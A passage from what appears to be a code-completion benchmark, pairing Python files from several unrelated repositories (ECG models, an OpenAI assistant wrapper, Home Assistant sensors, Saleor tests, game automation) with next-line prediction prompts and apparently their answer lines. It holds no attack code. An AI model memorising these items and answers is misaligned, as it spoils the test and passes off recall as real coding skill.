ps = [ps] if not isinstance(ps,Iterable) else ps
if len(ps)==1: ps = [ps[0]/2] * (len(lin_ftrs)-2) + ps
actns = [nn.ReLU(inplace=True) if act=="relu" else nn.ELU(inplace=True)] * (len(lin_ftrs)-2) + [None]
layers = [AdaptiveConcatPool1d() if concat_pooling else nn.AdaptiveAvgPool1d(1), Flatten()]
for ni,no,p,actn in zip(lin_ftrs[:-1],lin_ftrs[1:],ps,actns):
layers += bn_drop_lin(ni,no,bn,p,actn)
return nn.Sequential(*layers)
# Path: src/clinical_ts/inception1d.py
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
from .basic_conv1d import AdaptiveConcatPool1d,create_head1d
__all__ = ['conv', 'noop', 'InceptionBlock1d', 'Shortcut1d', 'InceptionBackbone', 'Inception1d', 'inception1d']
# Cell
# Cell
def conv(in_planes, out_planes, kernel_size=3, stride=1):
"convolution with padding"
return nn.Conv1d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=(kernel_size-1)//2, bias=False)
def noop(x): return x
# Cell
class InceptionBlock1d(nn.Module):
def __init__(self, ni, nb_filters, kss, stride=1, act='linear', bottleneck_size=32):
super().__init__()
self.bottleneck = conv(ni, bottleneck_size, 1, stride) if (bottleneck_size>0) else noop
self.convs = nn.ModuleList([conv(bottleneck_size if (bottleneck_size>0) else ni, nb_filters, ks) for ks in kss])
self.conv_bottle = nn.Sequential(nn.MaxPool1d(3, stride, padding=1), conv(ni, nb_filters, 1))
self.bn_relu = nn.Sequential(nn.BatchNorm1d((len(kss)+1)*nb_filters), nn.ReLU())
def forward(self, x):
#print("block in",x.size())
bottled = self.bottleneck(x)
out = self.bn_relu(torch.cat([c(bottled) for c in self.convs]+[self.conv_bottle(x)], dim=1))
return out
# Cell
class Shortcut1d(nn.Module):
def __init__(self, ni, nf):
super().__init__()
self.act_fn=nn.ReLU(True)
self.conv=conv(ni, nf, 1)
self.bn=nn.BatchNorm1d(nf)
def forward(self, inp, out):
#print("sk",out.size(), inp.size(), self.conv(inp).size(), self.bn(self.conv(inp)).size)
#input()
return self.act_fn(out + self.bn(self.conv(inp)))
# Cell
class InceptionBackbone(nn.Module):
def __init__(self, input_channels, kss, depth, bottleneck_size, nb_filters, use_residual):
super().__init__()
self.depth = depth
assert((depth % 3) == 0)
self.use_residual = use_residual
n_ks = len(kss) + 1
self.im = nn.ModuleList([InceptionBlock1d(input_channels if d==0 else n_ks*nb_filters,nb_filters=nb_filters,kss=kss, bottleneck_size=bottleneck_size) for d in range(depth)])
self.sk = nn.ModuleList([Shortcut1d(input_channels if d==0 else n_ks*nb_filters, n_ks*nb_filters) for d in range(depth//3)])
def forward(self, x):
input_res = x
for d in range(self.depth):
x = self.im[d](x)
if self.use_residual and d % 3 == 2:
x = (self.sk[d//3])(input_res, x)
input_res = x.clone()
return x
# Cell
class Inception1d(nn.Module):
'''inception time architecture'''
def __init__(self, num_classes=2, input_channels=8, kss=[39,19,9], depth=6, bottleneck_size=32, nb_filters=32, use_residual=True,lin_ftrs_head=None, ps_head=0.5, bn_final_head=False, bn_head=True, act_head="relu", concat_pooling=True):
super().__init__()
layers = [InceptionBackbone(input_channels=input_channels, kss=kss, depth=depth, bottleneck_size=bottleneck_size, nb_filters=nb_filters, use_residual=use_residual)]
n_ks = len(kss) + 1
#head
| head = create_head1d(n_ks*nb_filters, nc=num_classes, lin_ftrs=lin_ftrs_head, ps=ps_head, bn_final=bn_final_head, bn=bn_head, act=act_head, concat_pooling=concat_pooling) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: eblume/TyperAssistant
# Path: src/typerassistant/spec.py
class FunctionCall:
call_id: str
function: FunctionSpec
parameters: dict[str, Any]
def dict(self) -> dict:
return {
"call_id": self.call_id,
"function": self.function.name,
"parameters": self.parameters,
}
# Path: src/typerassistant/spec.py
class FunctionSpec:
name: str
description: str
parameters: list[ParameterSpec]
action: Callable[..., Any]
def tool(self) -> ToolAssistantToolsFunction:
return ToolAssistantToolsFunction(
type="function",
function=FunctionDefinition(
name=self.name,
description=self.description or "None",
parameters=self.json_parameters(),
),
)
def json_parameters(self) -> FunctionParameters:
# For some reason OpenAI doesn't continue to type this, but instead just provides dict[str, object].
# In any case, it's supposed to be a JSONSchema object, so we'll just do that manually for now.
# https://github.com/openai/openai-python/blob/main/src/openai/types/shared_params/function_parameters.py
parameters = {
"type": "object",
"properties": {param.name: param.dict() for param in self.parameters},
"required": [param.name for param in self.parameters if param.required],
}
# enum processing - do this in a second pass to avoid empty enums
for param in self.parameters:
if param.enum:
parameters["properties"][param.name]["enum"] = list(param.enum)
return parameters
# Path: src/typerassistant/assistant.py
import json
import time
from collections.abc import Iterable
from contextlib import redirect_stdout
from dataclasses import KW_ONLY, dataclass, field
from io import StringIO
from textwrap import shorten
from typing import Optional, Type, TypeVar
from openai import OpenAI
from openai.types.beta.assistant import Assistant as RemoteAssistant
from openai.types.beta.thread import Thread
from openai.types.beta.threads import RequiredActionFunctionToolCall
from openai.types.beta.threads.run_submit_tool_outputs_params import ToolOutput
from openai.types.beta.threads.thread_message import ThreadMessage
from rich import print
from rich.panel import Panel
from rich.prompt import Confirm
from .spec import FunctionCall, FunctionSpec
# The number of times to poll for a run to complete before giving up
MAX_RUN_ITERATIONS = 20
# The number of seconds to sleep between run iterations
RUN_ITERATION_SLEEP = 3
# The best usage guide for function calling seems to be:
# https://cookbook.openai.com/examples/how_to_call_functions_with_chat_models
AssistantT = TypeVar("AssistantT", bound="Assistant")
@dataclass
class Assistant:
"""An assistant managed remotely via OpenAI's assistant API.
This class implements the basic lifecycle of an assistant, from CRUD to running a thread. It is intended to be
subclassed to extend functionality.
"""
name: str
_: KW_ONLY
instructions: str = "The agent is a helpful assistant. Its behavior and capabilities can be extended via the 'typerassistant' python package's API."
client: OpenAI = field(default_factory=OpenAI)
replace: bool = False
_assistant: Optional[RemoteAssistant] = None
@classmethod
def from_id(cls: Type[AssistantT], assistant_id: str, client: Optional[OpenAI] = None) -> AssistantT:
"""Retrieve the assistant with the given ID from OpenAI.
This method will skip all assistant creation steps and simply use the remote definition."""
if client is None:
client = OpenAI()
assistant = client.beta.assistants.retrieve(assistant_id)
return cls(
client=client,
name=assistant.name or "Unnamed Assistant",
instructions=assistant.instructions or cls.instructions,
_assistant=assistant,
)
@property
def assistant(self) -> RemoteAssistant:
if self._assistant is None:
self._assistant = self.make_assistant(self.replace)
return self._assistant
def ask(
self,
query: str,
thread: Optional[Thread] = None,
use_commands: bool = True,
confirm_commands: bool = True,
instructions: Optional[str] = None,
) -> str:
"""Ask the assistant a question, returning the response.
This may block for the lifecycle of several API requests as well as waiting on remotely managed threads, in fact
blocking for several minutes and then succeeding is not uncommon. The caller should make arrangements for
multithreading, etc. should it be needed.
If a thread is not provided, a new one will be made.
"""
if thread is None:
thread = self.thread()
self.add_message(query, thread)
self.run_thread(thread, use_commands=use_commands, confirm_commands=confirm_commands, instructions=instructions)
messages = list(self.messages(thread))
content = messages[0].content
assert len(content) == 1
assert content[0].type == "text"
assert len(content[0].text.annotations) == 0
return content[0].text.value
| def functions(self) -> Iterable[FunctionSpec]: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Mat931/digitalstrom-homeassistant
# Path: custom_components/digitalstrom/const.py
CONF_DSUID: str = "dsuid"
# Path: custom_components/digitalstrom/const.py
DOMAIN = "digitalstrom"
# Path: custom_components/digitalstrom/entity.py
class DigitalstromEntity(Entity):
"""Define a base digitalSTROM entity."""
def __init__(self, device: DigitalstromDevice, entity_identifier: str):
"""Initialize the entity."""
self.device = device
self._attr_unique_id: str = f"{self.device.dsuid}_{entity_identifier}"
self.entity_id = f"{DOMAIN}.{self._attr_unique_id}"
self._attr_should_poll = False
self._has_state = False
@property
def device_info(self) -> DeviceInfo:
"""Return the device info."""
parent_device = (
self.device
if self.device.parent_device is None
else self.device.parent_device
)
zone_name = ""
if zone := self.device.apartment.zones.get(self.device.zone_id):
zone_name = zone.name
return DeviceInfo(
identifiers={(DOMAIN, parent_device.dsuid)},
name=parent_device.name,
manufacturer=parent_device.manufacturer,
model=parent_device.hw_info,
# sw_version=parent_device.sw_version,
via_device=(DOMAIN, parent_device.meter_dsuid),
suggested_area=zone_name,
)
@property
def available(self) -> bool:
return self.device.available
# Path: custom_components/digitalstrom/binary_sensor.py
import logging
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntity,
BinarySensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import EntityCategory
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import CONF_DSUID, DOMAIN
from .entity import DigitalstromEntity
name="Brightness",
device_class=BinarySensorDeviceClass.LIGHT,
),
3: BinarySensorEntityDescription(
key="3",
name="Presence in darkness",
device_class=BinarySensorDeviceClass.PRESENCE,
),
4: BinarySensorEntityDescription(
key="4",
name="Twilight",
device_class=BinarySensorDeviceClass.LIGHT,
),
5: BinarySensorEntityDescription(
key="5",
name="Motion",
device_class=BinarySensorDeviceClass.MOTION,
),
6: BinarySensorEntityDescription(
key="6",
name="Motion in darkness",
device_class=BinarySensorDeviceClass.MOTION,
),
7: BinarySensorEntityDescription(
key="7",
name="Smoke",
device_class=BinarySensorDeviceClass.SMOKE,
),
8: BinarySensorEntityDescription(
key="8",
name="Wind strength above limit",
device_class=BinarySensorDeviceClass.SAFETY,
),
9: BinarySensorEntityDescription(
key="9",
name="Rain",
device_class=BinarySensorDeviceClass.MOISTURE,
),
10: BinarySensorEntityDescription(
key="10",
name="Sun",
device_class=BinarySensorDeviceClass.LIGHT,
),
11: BinarySensorEntityDescription(
key="11",
name="Temperature below limit",
device_class=BinarySensorDeviceClass.COLD,
),
12: BinarySensorEntityDescription(
key="12",
name="Battery",
device_class=BinarySensorDeviceClass.BATTERY,
),
13: BinarySensorEntityDescription(
key="13",
name="Window",
device_class=BinarySensorDeviceClass.WINDOW,
),
14: BinarySensorEntityDescription(
key="14",
name="Door",
device_class=BinarySensorDeviceClass.DOOR,
),
15: BinarySensorEntityDescription(
key="15",
name="Window tilt",
device_class=BinarySensorDeviceClass.WINDOW,
),
16: BinarySensorEntityDescription(
key="16",
name="Garage door",
device_class=BinarySensorDeviceClass.GARAGE_DOOR,
),
17: BinarySensorEntityDescription(
key="17",
name="Sun protection",
device_class=BinarySensorDeviceClass.SAFETY,
),
18: BinarySensorEntityDescription(
key="18",
name="Frost",
device_class=BinarySensorDeviceClass.COLD,
),
19: BinarySensorEntityDescription(
key="19",
name="Heating system",
device_class=BinarySensorDeviceClass.HEAT,
),
20: BinarySensorEntityDescription(
key="20",
name="Warm water",
device_class=BinarySensorDeviceClass.HEAT,
),
21: BinarySensorEntityDescription(
key="21",
name="Initialization",
device_class=BinarySensorDeviceClass.RUNNING,
entity_category=EntityCategory.DIAGNOSTIC,
),
22: BinarySensorEntityDescription(
key="22",
name="Malfunction",
device_class=BinarySensorDeviceClass.PROBLEM,
entity_category=EntityCategory.DIAGNOSTIC,
),
23: BinarySensorEntityDescription(
key="23",
name="Service required",
device_class=BinarySensorDeviceClass.PROBLEM,
entity_category=EntityCategory.DIAGNOSTIC,
),
}
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the binary sensor platform."""
| client = hass.data[DOMAIN][config_entry.data[CONF_DSUID]]["client"] |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: mohenghui/detectAuto_v8
# Path: ultralytics/nn/modules/transformer.py
class LayerNorm2d(nn.Module):
"""
2D Layer Normalization module inspired by Detectron2 and ConvNeXt implementations.
Original implementations in
https://github.com/facebookresearch/detectron2/blob/main/detectron2/layers/batch_norm.py
and
https://github.com/facebookresearch/ConvNeXt/blob/main/models/convnext.py.
"""
def __init__(self, num_channels, eps=1e-6):
"""Initialize LayerNorm2d with the given parameters."""
super().__init__()
self.weight = nn.Parameter(torch.ones(num_channels))
self.bias = nn.Parameter(torch.zeros(num_channels))
self.eps = eps
def forward(self, x):
"""Perform forward pass for 2D layer normalization."""
u = x.mean(1, keepdim=True)
s = (x - u).pow(2).mean(1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.eps)
return self.weight[:, None, None] * x + self.bias[:, None, None]
# Path: ultralytics/nn/modules/transformer.py
class MLPBlock(nn.Module):
"""Implements a single block of a multi-layer perceptron."""
def __init__(self, embedding_dim, mlp_dim, act=nn.GELU):
"""Initialize the MLPBlock with specified embedding dimension, MLP dimension, and activation function."""
super().__init__()
self.lin1 = nn.Linear(embedding_dim, mlp_dim)
self.lin2 = nn.Linear(mlp_dim, embedding_dim)
self.act = act()
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Forward pass for the MLPBlock."""
return self.lin2(self.act(self.lin1(x)))
# Path: ultralytics/models/sam/modules/encoders.py
from typing import Any, Optional, Tuple, Type
from ultralytics.nn.modules import LayerNorm2d, MLPBlock
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
# Ultralytics YOLO 🚀, AGPL-3.0 license
class ImageEncoderViT(nn.Module):
"""
An image encoder using Vision Transformer (ViT) architecture for encoding an image into a compact latent space. The
encoder takes an image, splits it into patches, and processes these patches through a series of transformer blocks.
The encoded patches are then processed through a neck to generate the final encoded representation.
This class and its supporting functions below lightly adapted from the ViTDet backbone available at
https://github.com/facebookresearch/detectron2/blob/main/detectron2/modeling/backbone/vit.py.
Attributes:
img_size (int): Dimension of input images, assumed to be square.
patch_embed (PatchEmbed): Module for patch embedding.
pos_embed (nn.Parameter, optional): Absolute positional embedding for patches.
blocks (nn.ModuleList): List of transformer blocks for processing patch embeddings.
neck (nn.Sequential): Neck module to further process the output.
"""
def __init__(
self,
img_size: int = 1024,
patch_size: int = 16,
in_chans: int = 3,
embed_dim: int = 768,
depth: int = 12,
num_heads: int = 12,
mlp_ratio: float = 4.0,
out_chans: int = 256,
qkv_bias: bool = True,
norm_layer: Type[nn.Module] = nn.LayerNorm,
act_layer: Type[nn.Module] = nn.GELU,
use_abs_pos: bool = True,
use_rel_pos: bool = False,
rel_pos_zero_init: bool = True,
window_size: int = 0,
global_attn_indexes: Tuple[int, ...] = (),
) -> None:
"""
Args:
img_size (int): Input image size.
patch_size (int): Patch size.
in_chans (int): Number of input image channels.
embed_dim (int): Patch embedding dimension.
depth (int): Depth of ViT.
num_heads (int): Number of attention heads in each ViT block.
mlp_ratio (float): Ratio of mlp hidden dim to embedding dim.
qkv_bias (bool): If True, add a learnable bias to query, key, value.
norm_layer (nn.Module): Normalization layer.
act_layer (nn.Module): Activation layer.
use_abs_pos (bool): If True, use absolute positional embeddings.
use_rel_pos (bool): If True, add relative positional embeddings to the attention map.
rel_pos_zero_init (bool): If True, zero initialize relative positional parameters.
window_size (int): Window size for window attention blocks.
global_attn_indexes (list): Indexes for blocks using global attention.
"""
super().__init__()
self.img_size = img_size
self.patch_embed = PatchEmbed(
kernel_size=(patch_size, patch_size),
stride=(patch_size, patch_size),
in_chans=in_chans,
embed_dim=embed_dim,
)
self.pos_embed: Optional[nn.Parameter] = None
if use_abs_pos:
# Initialize absolute positional embedding with pretrain image size.
self.pos_embed = nn.Parameter(torch.zeros(1, img_size // patch_size, img_size // patch_size, embed_dim))
self.blocks = nn.ModuleList()
for i in range(depth):
block = Block(
dim=embed_dim,
num_heads=num_heads,
mlp_ratio=mlp_ratio,
qkv_bias=qkv_bias,
norm_layer=norm_layer,
act_layer=act_layer,
use_rel_pos=use_rel_pos,
rel_pos_zero_init=rel_pos_zero_init,
window_size=window_size if i not in global_attn_indexes else 0,
input_size=(img_size // patch_size, img_size // patch_size),
)
self.blocks.append(block)
self.neck = nn.Sequential(
nn.Conv2d(
embed_dim,
out_chans,
kernel_size=1,
bias=False,
),
| LayerNorm2d(out_chans), |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: i-super/Saleor
# Path: saleor/graphql/api.py
API_PATH = SimpleLazyObject(lambda: reverse("api"))
class Query(
AccountQueries,
AppQueries,
AttributeQueries,
ChannelQueries,
CheckoutQueries,
CoreQueries,
CsvQueries,
DiscountQueries,
PluginsQueries,
GiftCardQueries,
MenuQueries,
OrderQueries,
PageQueries,
PaymentQueries,
ProductQueries,
ShippingQueries,
ShopQueries,
StockQueries,
TaxQueries,
TranslationQueries,
WarehouseQueries,
WebhookQueries,
):
class Mutation(
AccountMutations,
AppMutations,
AttributeMutations,
ChannelMutations,
CheckoutMutations,
CoreMutations,
CsvMutations,
DiscountMutations,
ExternalNotificationMutations,
PluginsMutations,
GiftCardMutations,
InvoiceMutations,
MenuMutations,
MetaMutations,
OrderMutations,
PageMutations,
PaymentMutations,
ProductMutations,
ShippingMutations,
ShopMutations,
StockMutations,
TaxMutations,
WarehouseMutations,
WebhookMutations,
):
def serialize_webhook_event(value):
# Path: saleor/webhook/observability/buffers.py
class RedisBuffer(BaseBuffer):
_pools: dict[str, ConnectionPool] = {}
_socket_connect_timeout = 0.25
_client_name = "observability_buffer"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._client: Optional[Redis] = None
def get_connection_pool(self):
return ConnectionPool.from_url(
self.broker_url,
socket_connect_timeout=self._socket_connect_timeout,
socket_timeout=self.connection_timeout,
client_name=self._client_name,
)
def get_or_create_connection_pool(self):
if self.broker_url not in self._pools:
self._pools[self.broker_url] = self.get_connection_pool()
return self._pools[self.broker_url]
def connect(self) -> Redis:
pool = self.get_or_create_connection_pool()
return Redis(connection_pool=pool)
@property
def client(self) -> Redis:
if not self._client:
self._client = self.connect()
return self._client
def _put_events(
self, key: KEY_TYPE, events: list[Any], client: Optional[Redis] = None
) -> int:
start_index = -self.max_size
events_data = [self.encode(event) for event in events[start_index:]]
if client is None:
client = self.client
client.lpush(key, *events_data)
client.ltrim(key, 0, max(0, self.max_size - 1))
client.expire(key, self.timeout)
return max(0, len(events) - self.max_size)
def put_events(self, events: list[Any]) -> int:
with self.client.pipeline(transaction=False) as pipe:
dropped = self._put_events(self.key, events, client=pipe)
result = pipe.execute()
return dropped + max(0, result[0] - self.max_size)
def put_event(self, event: Any) -> int:
return self.put_events([event])
def put_multi_key_events(
self, events_dict: dict[KEY_TYPE, list[Any]]
) -> dict[KEY_TYPE, int]:
keys = list(events_dict.keys())
trimmed: dict[KEY_TYPE, int] = {}
if not keys:
return trimmed
with self.client.pipeline(transaction=False) as pipe:
for key in keys:
trimmed[key] = self._put_events(key, events_dict[key], client=pipe)
result = pipe.execute()
for key in keys:
buffer_len, _, _ = result.pop(0), result.pop(0), result.pop(0)
trimmed[key] += max(0, buffer_len - self.max_size)
return trimmed
def _pop_events(self, key: KEY_TYPE, batch_size: int) -> tuple[list[Any], int]:
events = []
with self.client.pipeline(transaction=False) as pipe:
pipe.llen(key)
for i in range(max(1, batch_size)):
pipe.rpop(key)
result = pipe.execute()
size = result.pop(0)
for elem in result:
if elem is None:
break
events.append(self.decode(elem))
return events, size - len(events)
def pop_event(self) -> Any:
events, _ = self._pop_events(self.key, batch_size=1)
return events[0] if events else None
def pop_events(self) -> list[Any]:
events, _ = self._pop_events(self.key, self.batch_size)
return events
def pop_events_get_size(self) -> tuple[list[Any], int]:
return self._pop_events(self.key, self.batch_size)
def clear(self) -> int:
with self.client.pipeline(transaction=False) as pipe:
pipe.llen(self.key)
pipe.delete(self.key)
result = pipe.execute()
return result[0]
def size(self) -> int:
return self.client.llen(self.key)
# Path: saleor/webhook/observability/utils.py
class GraphQLOperationResponse:
name: Optional[str] = None
query: Optional[GraphQLDocument] = None
variables: Optional[dict] = None
result: Optional[dict] = None
result_invalid: bool = False
# Path: saleor/webhook/observability/utils.py
def get_buffer_name() -> str:
return cache.make_key(BUFFER_KEY)
# Path: saleor/webhook/observability/tests/conftest.py
from typing import Optional
from unittest.mock import patch
from django.core.cache import cache
from graphql import get_default_backend
from redis import ConnectionPool
from ....graphql.api import schema
from ..buffers import RedisBuffer
from ..utils import GraphQLOperationResponse, get_buffer_name
import fakeredis
import pytest
backend = get_default_backend()
BROKER_URL_HOST = "fake-redis"
BROKER_URL = f"redis://{BROKER_URL_HOST}"
KEY, MAX_SIZE, BATCH_SIZE = get_buffer_name(), 10, 5
@pytest.fixture
def gql_operation_factory():
def factory(
query_string: str,
operation_name: Optional[str] = None,
variables: Optional[dict] = None,
result: Optional[dict] = None,
result_invalid=False,
) -> GraphQLOperationResponse:
| query = backend.document_from_string(schema, query_string) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Aues6uen11Z/Zafkiel
# Path: zafkiel/device/template.py
class ImageTemplate(Template):
def __init__(
self,
filename: str,
record_pos: tuple = None,
keyword: Keyword = None,
threshold: float = None,
target_pos: int = TargetPos.MID,
resolution: tuple = (1280, 720),
rgb: bool = False,
scale_max: int = 800,
scale_step: float = 0.005,
template_path: str = 'templates'
):
super().__init__(filename, threshold, target_pos, record_pos, resolution, rgb, scale_max, scale_step)
self.template_path = template_path # under root path
self.keyword = keyword
if self.keyword is not None and self.keyword.name == '':
"""
Please note that due to the __post_init__ method of the Keyword class running before this 'name' assignment,
its 'instances' dictionary will get a dictionary item with an empty string key.
This means that each instance of the Keyword class that omits the 'name' parameter will be constantly
overwritten. If you want to use Keyword().instances for special purposes, you must initialize 'name'.
"""
self.keyword.name = self.name
@cached_property
def filepath(self) -> str:
if self._filepath:
return self._filepath
for dir_name in G.BASEDIR:
filepath = os.path.join(dir_name, self.template_path, self.filename)
if os.path.isfile(filepath):
self._filepath = filepath
return self._filepath
return self.filename
@cached_property
def name(self) -> str:
return Path(self.filename).stem
@cached_property
def image(self) -> ndarray:
return self._imread()
@cached_property
def height(self) -> int:
return self.image.shape[0]
@cached_property
def width(self) -> int:
return self.image.shape[1]
def _has_border(self) -> bool:
"""
If game running in a bordered process, coordinates need to be corrected.
Returns:
Whether the game running in a bordered process.
"""
actual_ratio = G.DEVICE.get_current_resolution()[0] / G.DEVICE.get_current_resolution()[1]
template_ratio = self.resolution[0] / self.resolution[1]
return actual_ratio != template_ratio
def ratio(self, screen_height: float = None) -> float:
"""
Calculate the ratio of the current screen to the template image.
"""
if screen_height is None:
if self._has_border():
border = Config.BORDER[0] + Config.BORDER[2]
else:
border = 0
screen_height = G.DEVICE.get_current_resolution()[1] - border
return screen_height / self.resolution[1]
@cached_property
def area(self) -> tuple:
"""
Calculate the area of the template image on the current screen.
Returns:
Upper left and lower right corner coordinate.
"""
screen_resolution = G.DEVICE.get_current_resolution()
if self._has_border():
border = Config.BORDER
else:
border = (0, 0, 0)
screen_width = screen_resolution[0] - border[1] * 2
screen_height = screen_resolution[1] - border[0] - border[2]
ratio = self.ratio(screen_height)
x1 = screen_width / 2 + self.record_pos[0] * screen_width - self.width / 2 * ratio + border[1]
y1 = screen_height / 2 + self.record_pos[1] * screen_width - self.height / 2 * ratio + border[0]
x2 = screen_width / 2 + self.record_pos[0] * screen_width + self.width / 2 * ratio + border[1]
y2 = screen_height / 2 + self.record_pos[1] * screen_width + self.height / 2 * ratio + border[0]
return x1, y1, x2, y2
# Path: zafkiel/exception.py
class ScriptError(Exception):
pass
# Path: zafkiel/ui/switch.py
from zafkiel.device.template import ImageTemplate as Template
from zafkiel.exception import ScriptError
class Switch:
"""
A wrapper to handle switches in game, switch among states with retries.
Main code comes from https://github.com/LmeSzinc/StarRailCopilot/blob/master/module/ui/switch.py
Examples:
# Definitions
submarine_hunt = Switch('Submarine_hunt', offset=120)
submarine_hunt.add_state('on', check_button=Template(r"assets/ON.png"))
submarine_hunt.add_state('off', check_button=Template(r"assets/OFF.png"))
# Change state to ON
submarine_view.set(TPL_ON)
"""
def __init__(self, name: str = 'Switch', is_selector: bool = False):
"""
Args:
name:
is_selector: True if this is a multi choice, click to choose one of the switches.
For example: | [Daily] | Urgent | -> click -> | Daily | [Urgent] |
False if this is a switch, click the switch itself, and it changed in the same position.
For example: | [ON] | -> click -> | [OFF] |
"""
self.name = name
self.is_choice = is_selector
self.state_list = []
def __str__(self):
return self.name
__repr__ = __str__
def add_state(self, state: str, check_button: Template, click_button: Template = None):
"""
Args:
state: Must match check_button.name
check_button:
click_button:
"""
self.state_list.append({
'state': state,
'check_button': check_button,
'click_button': click_button if click_button is not None else check_button,
})
def get_data(self, state: Template) -> dict:
"""
Args:
state:
Returns:
Dictionary in add_state
Raises:
ScriptError: If state invalid
"""
for row in self.state_list:
if row['state'] == state.name:
return row
| raise ScriptError(f'Switch {self.name} received an invalid state {state}') |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: medkit-lib/medkit
# Path: medkit/training/utils.py
class BatchData(dict):
"""A BatchData pack data allowing both column and row access"""
def __getitem__(self, index: int) -> Dict[str, Union[List[Any], torch.Tensor]]:
if isinstance(index, str):
inner_dict = dict(self.items())
return inner_dict[index]
return {key: values[index] for key, values in self.items()}
def to_device(self, device: torch.device) -> BatchData:
"""
Ensure that Tensors in the BatchData object are on the specified `device`
Parameters
----------
device:
A `torch.device` object representing the device on which tensors
will be allocated.
Returns
-------
BatchData
A new object with the tensors on the proper device.
"""
inner_batch = BatchData()
for key, value in self.items():
if isinstance(value, torch.Tensor):
inner_batch[key] = value.to(device)
else:
inner_batch[key] = value
return inner_batch
# Path: tests/unit/training/dummy_context_component/dummy_model.py
class DummyTextCat(nn.Module):
"""Construct a dummy model for text classification using a embedding bag architecture"""
def __init__(self, config: DummyTextCatConfig):
super().__init__()
self.model_name = "TextCat"
self.config = config
self.loss = torch.nn.CrossEntropyLoss()
self.embedding = nn.EmbeddingBag(self.config.vocab_size, self.config.embed_dim, sparse=True)
self.fc = nn.Linear(self.config.embed_dim, self.config.num_class)
self.init_weights()
def init_weights(self):
initrange = 0.5
self.embedding.weight.data.uniform_(-initrange, initrange)
self.fc.weight.data.uniform_(-initrange, initrange)
self.fc.bias.data.zero_()
def forward(self, inputs_ids: torch.FloatTensor, offsets: torch.FloatTensor) -> BatchData:
embedded = self.embedding(inputs_ids, offsets)
logits = self.fc(embedded)
return logits
def compute_loss(self, logits: torch.FloatTensor, labels: torch.FloatTensor):
return self.loss(logits, labels)
# Path: tests/unit/training/dummy_context_component/dummy_model.py
class DummyTextCatConfig:
vocab_size: int = 512
embed_dim: int = 16
num_class: int = 2
# Path: tests/unit/training/dummy_context_component/dummy_model.py
class DummyTokenizer:
def __call__(self, text: str) -> List[int]:
return [ord(char) for char in text]
# Path: tests/unit/training/dummy_context_component/dummy_component.py
import os
import torch
from typing import Optional
from medkit.training import BatchData
from .dummy_model import DummyTextCat, DummyTextCatConfig, DummyTokenizer
PYTORCH_MODEL_NAME = "pytorch_model.bin"
class MockTrainableComponent:
def __init__(
self,
model_path: Optional[str] = None,
output_label: str = "category",
device="cpu",
):
self.tokenizer = DummyTokenizer()
# load architecture
| self.model = DummyTextCat(config=DummyTextCatConfig()) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: donahowe/VE-MLD
# Path: src_files/ml_decoder/ml_decoder.py
def add_ml_decoder_head(model, num_classes=-1, num_of_groups=-1, decoder_embedding=768, zsl=0):
if num_classes == -1:
num_classes = model.num_classes
num_features = model.num_features
if hasattr(model, 'global_pool') and hasattr(model, 'fc'): # resnet50
model.global_pool = nn.Identity()
del model.fc
model.fc = MLDecoder(num_classes=num_classes, initial_num_features=num_features, num_of_groups=num_of_groups,
decoder_embedding=decoder_embedding, zsl=zsl)
elif hasattr(model, 'head'): # tresnet
if hasattr(model, 'global_pool'):
model.global_pool = nn.Identity()
del model.head
model.head = MLDecoder(num_classes=num_classes, initial_num_features=num_features, num_of_groups=num_of_groups,
decoder_embedding=decoder_embedding, zsl=zsl)
else:
print("model is not suited for ml-decoder")
exit(-1)
return model
# Path: src_files/models/tresnet/tresnet.py
def TResnetM(model_params):
"""Constructs a medium TResnet model.
"""
in_chans = 3
num_classes = model_params['num_classes']
model = TResNet(layers=[3, 4, 11, 3], num_classes=num_classes, in_chans=in_chans)
return model
# Path: src_files/models/tresnet/tresnet.py
def TResnetL(model_params):
"""Constructs a large TResnet model.
"""
in_chans = 3
num_classes = model_params['num_classes']
layers_list = [3, 4, 23, 3]
model = TResNet(layers=layers_list, num_classes=num_classes, in_chans=in_chans, first_two_layers=Bottleneck)
return model
# Path: src_files/models/tresnet/tresnet.py
def TResnetXL(model_params):
"""Constructs a large TResnet model.
"""
in_chans = 3
num_classes = model_params['num_classes']
layers_list = [3, 8, 34, 5]
model = TResNet(layers=layers_list, num_classes=num_classes, in_chans=in_chans, first_two_layers=Bottleneck)
return model
# Path: src_files/models/vit.py
def VE(model_params):
in_chans = 3
num_classes = model_params['num_classes']
imagesize = model_params['image_size']
patchsize = 32
model = ViT(num_classes=num_classes, channels=in_chans, image_size=imagesize ,patch_size=patchsize)
return model
# Path: src_files/models/utils/factory.py
import logging
import os
import torch
from urllib import request
